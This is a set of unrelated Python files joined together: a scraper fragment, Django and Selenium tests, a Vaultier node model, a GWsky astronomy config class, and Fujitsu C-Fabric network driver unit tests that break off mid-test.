for data in response.get("result"):
logging.info(data["companyFullName"])
self.MGO[self.collection].find_one_and_replace({'companyId': data["companyId"]}, data, upsert=True)
except Exception as e:
self.totalCount = 2000
self.pageSize = 16
logging.error("Post " + str(num) + " with error.")
logging.error(e)
time.sleep(self.RandomLimit())
|
# Python
from __future__ import unicode_literals
# Django-Site-Utils
from site_utils.utils import app_is_installed
def test_app_is_installed(settings):
assert app_is_installed('contenttypes')
assert app_is_installed('django.contrib.contenttypes')
assert app_is_installed('admin')
assert app_is_installed('django.contrib.admin')
assert not app_is_installed('flatpages')
assert not app_is_installed('django.contrib.flatpages')
assert app_is_installed('site_utils')
|
'''
To run functional tests:
python3 manage.py test functional_tests
'''
import sys
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class NewVisitorTest(StaticLiveServerTestCase):
@classmethod
def setUpClass(cls):
for arg in sys.argv:
if 'liveserver' in arg:
cls.server_url = 'http://' + arg.split('=')[1]
return
super().setUpClass()
cls.server_url = cls.live_server_url
@classmethod
def tearDownClass(cls):
if cls.server_url == cls.live_server_url:
super().tearDownClass()
def setUp(self):
self.browser = webdriver.Firefox()
self.browser.implicitly_wait(3)
def tearDown(self):
self.browser.quit()
def test_can_view_home_page(self):
        # Visit the portfolio home page
        self.browser.get(self.server_url)
        # See that the title mentions the portfolio
self.assertIn('Finders Keepers', self.browser.title)
# And the basic elements are rendered
self.browser.find_element_by_id('map')
self.browser.find_element_by_id('message')
def test_layout_and_styling(self):
self.browser.get(self.server_url)
h1 = self.browser.find_element_by_tag_name('h1')
self.assertEqual(h1.value_of_css_property(
'color'), 'rgba(255, 255, 255, 1)')
|
from django.db.models.loading import get_model
from mptt import models as mpttmodels
from django.db import models
from django.conf import settings
from accounts.business.fields import MemberStatusField
from nodes.business.managers import NodeManager
from nodes.roles import ManageRole
from vaultier.business.db import TimestampableMixin
from django_mptt_acl.models import PolicyModel, ReadRole, CreateRole, WriteRole
class Node(mpttmodels.MPTTModel, TimestampableMixin):
"""
Node model
"""
ENC_VERSION = 1
name = models.CharField(max_length=255)
meta = models.TextField(null=True, blank=True)
type = models.IntegerField()
data = models.TextField(null=True, blank=True)
blob_data = models.FileField(
upload_to='', null=True, blank=True)
color = models.CharField(max_length=7, blank=True, null=True)
parent = mpttmodels.TreeForeignKey(
'self', null=True, blank=True, related_name='children')
enc_version = models.IntegerField(default=ENC_VERSION)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name="nodes")
objects = NodeManager()
# class Meta:
# db_table = u'vaultier_node'
def get_user_member(self, user):
model = get_model("accounts.Member")
return model.objects.get(user=user, node=self.get_root())
def save(self, *args, **kwargs):
self.acl_propagation_stopped = True
super(Node, self).save(*args, **kwargs)
if kwargs.get('force_insert') and not self.parent:
self.acl_principal = get_model('accounts', 'Member')(
node=self,
user=self.created_by,
status=MemberStatusField.STATUS_MEMBER,
created_by=self.created_by
)
self.acl_principal.save()
else:
try:
member = get_model('accounts', 'Member').objects.get(
node=self.get_root(), user=self.created_by)
self.acl_principal = member
            except Exception:
pass
self.acl.insert(created=kwargs.get('force_insert'))
def delete(self, *args, **kwargs):
self.acl_principal = get_model('accounts', 'Member').objects.get(
node=self.get_root(), user=self.created_by)
super(Node, self).delete(*args, **kwargs)
class Policy(PolicyModel):
principal = models.ForeignKey("accounts.Member")
subject = models.ForeignKey(Node, related_name="_policies")
# class Meta:
# db_table = u'vaultier_policy'
def get_user_member(self, user):
model = get_model("accounts.Member")
return model.objects.get(user=user, node=self.subject.get_root())
class PolicyMeta:
subject_owner_field = 'created_by'
roles = {
'manage': ManageRole,
'read': ReadRole,
'create': CreateRole,
'write': WriteRole
}
class Meta:
unique_together = ('subject', 'principal')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
import cPickle as pickle
except ImportError:
import pickle
class UserValues(object):
"""
    A class whose instance attributes are taken by default from the
    'GWsky_config' dictionary. GWsky_config is created and pickled by the
    'user_values' module and is deleted when the program closes.
"""
def __init__(self, infile_config='GWsky_config'):
"""
'GWsky_config' contains the keys below:
self.skymap: a valid LVC skymap in healpix format;
self.nside: Resolution parameter of HEALPIX
Geodetic coordinates of the Observatory:
self.latitude: latitude[deg];
self.longitude: longitude[deg];
self.altitude: altitude[m];
self.catalog: catalog name in Vizier code
self.obs_time: starting time [yyyy-mm-dd hh:mm:ss];
self.fov_width: field-of-view width [deg] -->> if selected;
self.fov_height: field-of-view height [deg] -->> if selected;
self.fov_radius: field-of-view radius [deg] -->> if selected;
self.fov_shape: (1) box or (2) circle;
self.ra_max_pixel: right ascension of maximum probability pixel [deg];
self.dec_max_pixel: declination of maximum probability pixel [deg];
        self.GWsky_basic: ('A') active statistic window;
                        : ('D') inactive statistic window;
        self.trasparency: window transparency
        self.column_1: first catalog column selected by user;
        self.column_2: second catalog column selected by user;
        self.filter_1: applied filter in column 1;
        self.filter_2: applied filter in column 2.
"""
self.infile_config = infile_config
with open(self.infile_config, 'rb') as data:
config_GWsky = pickle.load(data)
for k, v in config_GWsky.items():
setattr(self, k, v)
def set_infile_config(self, new_infile_config):
self.infile_config = new_infile_config
def get_infile_config(self):
return self.infile_config
def set_skymap(self, new_skymap):
self.skymap = new_skymap
def get_skymap(self):
return self.skymap
def set_nside(self, new_nside):
self.nside = new_nside
def get_nside(self):
return self.nside
def set_latitude(self, new_latitude):
self.latitude = new_latitude
def get_latitude(self):
return self.latitude
def set_longitude(self, new_longitude):
self.longitude = new_longitude
def get_longitude(self):
return self.longitude
def set_altitude(self, new_altitude):
self.altitude = new_altitude
def get_altitude(self):
return self.altitude
def set_catalog(self, new_catalog):
self.catalog = new_catalog
def get_catalog(self):
return self.catalog
def set_obs_time(self, new_obs_time):
self.obs_time = new_obs_time
def get_obs_time(self):
return self.obs_time
def set_fov_width(self, new_fov_width):
self.fov_width = new_fov_width
def get_fov_width(self):
return self.fov_width
def set_fov_height(self, new_fov_height):
self.fov_height = new_fov_height
def get_fov_height(self):
return self.fov_height
def set_fov_radius(self, new_fov_radius):
self.fov_radius = new_fov_radius
def get_fov_radius(self):
return self.fov_radius
def set_ra_max_pixel(self, new_ra_max_pixel):
self.ra_max_pixel = new_ra_max_pixel
def get_ra_max_pixel(self):
return self.ra_max_pixel
def set_dec_max_pixel(self, new_dec_max_pixel):
self.dec_max_pixel = new_dec_max_pixel
def get_dec_max_pixel(self):
return self.dec_max_pixel
def set_GWsky_basic(self, new_GWsky_basic):
self.GWsky_basic = new_GWsky_basic
def get_GWsky_basic(self):
return self.GWsky_basic
    def set_win_trasparency(self, new_trasparency):
        self.trasparency = new_trasparency
def get_win_trasparency(self):
return self.trasparency
def set_column_1(self, new_column_1):
self.column_1 = new_column_1
def get_column_1(self):
return self.column_1
def set_column_2(self, new_column_2):
self.column_2 = new_column_2
def get_column_2(self):
return self.column_2
    def set_filter_1(self, new_filter_1):
self.filter_1 = new_filter_1
def get_filter_1(self):
return self.filter_1
    def set_filter_2(self, new_filter_2):
self.filter_2 = new_filter_2
def get_filter_2(self):
return self.filter_2
def set_fov_shape(self, new_fov_shape):
        self.fov_shape = new_fov_shape
def get_fov_shape(self):
return self.fov_shape
def __repr__(self):
with open(self.infile_config, 'rb') as data:
config_GWsky = pickle.load(data)
return str(config_GWsky)
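# Minimal usage sketch (assumes a pickled 'GWsky_config' file exists in the
# working directory; the catalog code below is illustrative):
#     user = UserValues()
#     print(user.get_skymap(), user.get_nside())
#     user.set_catalog('VII/275/glade1')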
|
# Copyright 2015-2016 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import os
import re
import select
import socket
import testtools
import time
from itertools import chain
from networking_fujitsu.ml2.cfab import cfabdriver
from networking_fujitsu.ml2.cfab.mech_cfab import cfg
from neutron.common import utils
from neutron.plugins.ml2.common import exceptions as ml2_exc
from neutron.plugins.ml2 import config as ml2_config
from neutron.tests import base
FUJITSU_CFAB = "networking_fujitsu.ml2.cfab."
_CFABDRIVER__CFABMANAGER = FUJITSU_CFAB + "cfabdriver._CFABManager"
_TELNETLIB_TELNET = FUJITSU_CFAB + "cfabdriver.telnetlib.Telnet"
_EXCLUDE_BRACKET_LINE_RE = re.compile(r"^[^[].*$", re.MULTILINE)
class BaseTestMockedCFABManager(base.BaseTestCase):
"""Base class to test Fujitsu C-Fabric manager."""
def setUp(self):
super(BaseTestMockedCFABManager, self).setUp()
self.manager = cfabdriver._CFABManager()
self.manager.close_session = mock.MagicMock()
def assert_wrote(self, lines):
telnet = self.manager._telnet
""":type : mock.MagicMock"""
self.assertEqual(
lines, [x[0][0] for x in telnet.write.call_args_list])
class TestMockedCFABManager(BaseTestMockedCFABManager):
"""Test Fujitsu C-Fabric manager."""
def test_connect(self):
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
self.manager.connect("address", "username", "password")
telnet.assert_called_once_with(
host="address",
port=cfabdriver.TELNET_PORT,
timeout=cfabdriver._TIMEOUT)
self.assert_wrote(["username\n", "password\n"])
def test_connect_fail(self):
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
telnet.side_effect = socket.error
self.assertRaises(
socket.error,
self.manager.connect, "address", "username", "password")
def test_reconnect_raise_exceptions(self):
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
for er in [EOFError, EnvironmentError, ValueError, OSError]:
tel = telnet.return_value
tel.read_until.side_effect = er
self.manager.close_session()
self.assertRaises(er, self.manager._reconnect)
self.assertEqual(0, self.manager._retry_count)
def test_reconnect_busy_and_retry(self):
busy = 'The system is busy. Please login after waiting for a while.\n'
max_session = 'Login failed to switch.(too many sessions. bye!\n)'
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
tel = telnet.return_value
tel.read_until.side_effect = [busy,
max_session,
cfabdriver._PROMPT_LOGIN,
cfabdriver._PROMPT_PASS,
cfabdriver._PROMPT_ADMIN]
time.sleep = mock.MagicMock()
time.sleep.side_effect = None
self.manager.connect("address", "username", "password")
self.assertEqual(3, self.manager.close_session.call_count)
self.assertEqual(0, self.manager._retry_count)
time.sleep.assert_called_with(cfabdriver._WAIT_FOR_BUSY)
def test_reconnect_busy_and_reached_maxium_retry(self):
busy = 'The system is busy. Please login after waiting for a while.\n'
with mock.patch(_TELNETLIB_TELNET, autospec=True) as telnet:
tel = telnet.return_value
tel.read_until.return_value = busy
time.sleep = mock.MagicMock()
time.sleep.side_effect = None
self.assertRaises(
ValueError,
self.manager.connect, "address", "username", "password")
retry_count = cfabdriver._TIMEOUT / cfabdriver._WAIT_FOR_BUSY
self.assertEqual(12, self.manager.close_session.call_count)
self.assertEqual(retry_count, time.sleep.call_count)
self.assertEqual(0, self.manager._retry_count)
class BaseTestMockedCFABManagerConnected(BaseTestMockedCFABManager):
"""Base class to test Fujitsu C-Fabric manager after connected."""
def setUp(self):
super(BaseTestMockedCFABManagerConnected, self).setUp()
with mock.patch(_TELNETLIB_TELNET, autospec=True):
self.manager.connect("address", "username", "password")
self.prompt = "# "
def read_until(*args, **kwargs):
return "(config)# "
def expect(*args, **kwargs):
s = self.prompt
m = args[0][0].search(s)
return 0 if m is not None else -1, m, s
self.manager._telnet.read_until.side_effect = read_until
self.manager._telnet.expect.side_effect = expect
class TestMockedCFABManagerConnected(BaseTestMockedCFABManagerConnected):
"""Test Fujitsu C-Fabric manager after connected.
"""
def test_get_candidate_config(self):
candidate_config = self.manager.get_candidate_config()
self.assertEqual(
mock.call("show candidate-config\n"),
self.manager._telnet.write.call_args)
self.assertEqual("", candidate_config)
def test_get_running_config(self):
running_config = self.manager.get_running_config()
self.assertEqual(
mock.call("show running-config\n"),
self.manager._telnet.write.call_args)
self.assertEqual("", running_config)
def test_configure(self):
cmd = "pprofile 1 vlan tag 1"
self.manager.configure([cmd])
call_args_list = self.manager._telnet.write.call_args_list
self.assertIn(mock.call("configure\n"), call_args_list)
self.assertIn(mock.call(cmd + "\n"), call_args_list)
self.assertIn(mock.call("commit\n"), call_args_list)
self.assertEqual(
mock.call("save\n"), self.manager._telnet.write.call_args)
def test_configure_without_commit(self):
cmd = "pprofile 1 vlan tag 1"
self.manager.configure([cmd], commit=False)
call_args_list = self.manager._telnet.write.call_args_list
self.assertIn(mock.call("configure\n"), call_args_list)
self.assertIn(mock.call(cmd + "\n"), call_args_list)
self.assertNotIn(mock.call("commit\n"), call_args_list)
class TestMockedCFABManagerConnectedWithoutSave(
BaseTestMockedCFABManagerConnected):
"""Test Fujitsu C-Fabric manager after connected without save.
"""
def setUp(self):
super(TestMockedCFABManagerConnectedWithoutSave, self).setUp()
self.manager.save_config = False
def test_configure_without_save(self):
cmd = "pprofile 1 vlan tag 1"
self.manager.configure([cmd])
call_args_list = self.manager._telnet.write.call_args_list
self.assertIn(mock.call("configure\n"), call_args_list)
self.assertIn(mock.call(cmd + "\n"), call_args_list)
self.assertEqual(
mock.call("commit\n"), self.manager._telnet.write.call_args)
self.assertNotIn(mock.call("save\n"), call_args_list)
@testtools.skipUnless(
'OS_FUJITSU_CFAB_ADDRESS' in os.environ,
"OS_FUJITSU_CFAB_ADDRESS environment variable is not defined.")
class TestCFABManager(base.BaseTestCase):
"""Test Fujitsu C-Fabric manager using the real telnet connection.
Tests will be performed using the C-Fabric CLI through a telnet connection
to the address OS_FUJITSU_CFAB_ADDRESS and the port OS_FUJITSU_CFAB_PORT
(defaults to 23). The username will be taken from OS_FUJITSU_CFAB_USERNAME
(defaults to "admin") and the password will be taken from
OS_FUJITSU_CFAB_PASSWORD (defaults to "password").
If the environment variable OS_FUJITSU_CFAB_ADDRESS is NOT defined, tests
will be skipped.
"""
def _setup_lock(self):
"""Set up lock_path so that all tests are serialized.
This is necessary to keep the C-Fabric config consistent within each
test.
"""
try:
ml2_config.cfg.CONF.set_override('lock_path', "lock")
except ml2_config.cfg.NoSuchOptError:
ml2_config.cfg.CONF.set_override(
'lock_path', "lock", "oslo_concurrency")
def setUp(self):
super(TestCFABManager, self).setUp()
self._setup_lock()
try:
cfabdriver.TELNET_PORT = int(os.environ['OS_FUJITSU_CFAB_PORT'])
except KeyError:
pass
self.manager = cfabdriver.CFAB_MANAGER
self.manager.connect(
os.environ.get('OS_FUJITSU_CFAB_ADDRESS'),
os.environ.get('OS_FUJITSU_CFAB_USERNAME') or "admin",
os.environ.get('OS_FUJITSU_CFAB_PASSWORD') or "password",
)
def assert_running_config(self, prefix, expected_config):
running_config = self.manager.get_running_config(prefix=prefix)
self.assertEqual(
expected_config, _EXCLUDE_BRACKET_LINE_RE.findall(running_config))
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_modes(self):
self.manager._close_session()
self.assertEqual(cfabdriver._MODE_ADMIN, self.manager._get_mode())
self.manager._execute("configure")
self.assertEqual(cfabdriver._MODE_CONFIG, self.manager._get_mode())
self.manager._execute("interface 1/1/1/1")
self.assertEqual(cfabdriver._MODE_CONFIG_IF, self.manager._get_mode())
self.manager._execute("exit")
self.assertEqual(cfabdriver._MODE_CONFIG, self.manager._get_mode())
self.manager._execute("exit")
self.assertEqual(cfabdriver._MODE_ADMIN, self.manager._get_mode())
self.manager._execute("exit")
self.assertEqual(cfabdriver._MODE_USER, self.manager._get_mode())
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_get_running_config(self):
self.manager.configure(
["no pprofile",
"pprofile 1 vlan tag 1",
"pprofile 2 vlan tag 2"])
running_config = self.manager.get_running_config()
self.assertEqual(
["pprofile 1 vlan tag 1", "pprofile 2 vlan tag 2"],
re.findall(r"^pprofile\s+.+$", running_config, re.MULTILINE))
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_get_running_config_prefix(self):
self.manager.configure(
["no pprofile",
"pprofile 1 vlan tag 1",
"pprofile 2 vlan tag 2"])
self.assert_running_config(
"pprofile", ["1 vlan tag 1", "2 vlan tag 2"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure(self):
self.manager.configure(["no pprofile"])
self.assert_running_config("pprofile", [])
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_from_interface_config(self):
self.manager.configure(["no pprofile"])
self.manager._execute("interface 1/1/1/1")
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_from_user(self):
self.manager.configure(["no pprofile"])
self.manager._execute("exit")
self.manager._execute("exit")
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_from_closed(self):
self.manager.configure(["no pprofile"])
self.manager._close_session()
self.manager.configure(["pprofile 1 vlan tag 1"])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_no_commit(self):
self.manager.configure(["no pprofile"])
self.manager.configure(["pprofile 1 vlan tag 1"], commit=False)
self.assert_running_config("pprofile", [])
self.manager.configure([])
self.assert_running_config("pprofile", ["1 vlan tag 1"])
@utils.synchronized(cfabdriver._LOCK_NAME, external=True)
def test_configure_error(self):
self.assertRaises(
ml2_exc.MechanismDriverError, self.manager.configure, ["error"])
class BaseTestCFABdriver(base.BaseTestCase):
"""Base class to test Fujitsu C-Fabric mechanism driver.
"""
def setUp(self):
self.ports = "1/1/0/1"
self.mac = "00:01:02:03:04:05"
super(BaseTestCFABdriver, self).setUp()
with mock.patch(_CFABDRIVER__CFABMANAGER, autospec=True) as mocked:
self.driver = cfabdriver.CFABdriver(cfg.CONF)
self.driver.mgr = mocked.return_value
def assert_configured(self, cmds):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
tmp = [x[0][0] for x in mgr.configure.call_args_list]
actual = list(chain.from_iterable(tmp))
self.assertEqual(cmds, actual)
# Make sure that only the last configure has commit=True.
commits = [x[1].get('commit', True)
for x in mgr.configure.call_args_list]
self.assertTrue(commits.pop())
commits.append(False)
self.assertEqual({False}, set(commits))
class TestCFABdriver(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver.
"""
def test_associate_mac_to_network_raises(self):
self.driver.mgr = mock.Mock()
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.connect.side_effect = er
self.assertRaises(er, cfab.associate_mac_to_network,
'a', 'u', 'p', '1', 8, self.mac)
mgr.connect.side_effect = ml2_exc.MechanismDriverError(
method='connect')
self.assertRaises(ml2_exc.MechanismDriverError,
cfab.associate_mac_to_network,
'a', 'u', 'p', '1', 8, self.mac)
self.assertEqual(5, mgr.close_session.call_count)
def test_dissociate_mac_from_network_raises(self):
self.driver.mgr = mock.Mock()
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.connect.side_effect = er
self.assertRaises(er, cfab.dissociate_mac_from_network,
'a', 'u', 'p', '1', 8, self.mac)
mgr.connect.side_effect = ml2_exc.MechanismDriverError(
method='connect')
self.assertRaises(ml2_exc.MechanismDriverError,
cfab.dissociate_mac_from_network,
'a', 'u', 'p', '1', 8, self.mac)
self.assertEqual(5, mgr.close_session.call_count)
def test_associate_mac_to_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
mgr.close_session.assert_called_once_with()
self.assert_configured(
["vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_associate_mac_to_network_no_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = ""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 00:01:02:03:04:05 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_associate_mac_to_network_existing(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
def test_associate_mac_to_network_existing_override(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile test-2 vlan tag 2
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 test-2
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 00:01:02:03:04:05 vlan tag 2",
"vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_associate_mac_to_network_override_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 1,2
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 00:01:02:03:04:05 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 "
"00:01:02:03:04:05"])
def test_dissociate_mac_from_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["no vfab 3 pprofile 0",
"no pprofile 00:01:02:03:04:05"])
def test_dissociate_mac_from_network_still_used_in_other_vfab(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = (
"""pprofile 00:01:02:03:04:05 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:05 00:01:02:03:04:05
""")
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
class TestCFABdriverSharePprofile(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver with shared pprofile.
"""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
super(TestCFABdriverSharePprofile, self).setUp()
def test_associate_mac_to_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 2 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:00:00:00:00:01 2
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 2"])
def test_associate_mac_to_network_no_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = ""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
mgr.close_session.assert_called_once_with()
self.assert_configured(
["pprofile 2 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 2"])
def test_associate_mac_to_network_existing(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
def test_associate_mac_to_network_existing_override(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 4
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile 2 vlan tag 2",
"vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 2"])
def test_dissociate_mac_from_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["no vfab 3 pprofile 0",
"no pprofile 1"])
def test_dissociate_mac_from_network_still_used(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:06 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_still_used_in_other_vfab(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:06 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_no_match(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 4
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
class TestCFABdriverSharedPprofilePrefixed(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver with pprofile prefix.
"""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverSharedPprofilePrefixed, self).setUp()
def test_associate_mac_to_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile test-2 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:00:00:00:00:01 test-2
"""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.close_session.assert_called_once_with()
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:05 test-2"])
def test_associate_mac_to_network_no_pprofile(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = ""
self.driver.associate_mac_to_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["pprofile test-2 vlan tag 2",
"vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-2"])
def test_dissociate_mac_from_network(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
pprofile test-1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:06 1
"""
self.driver.dissociate_mac_from_network(
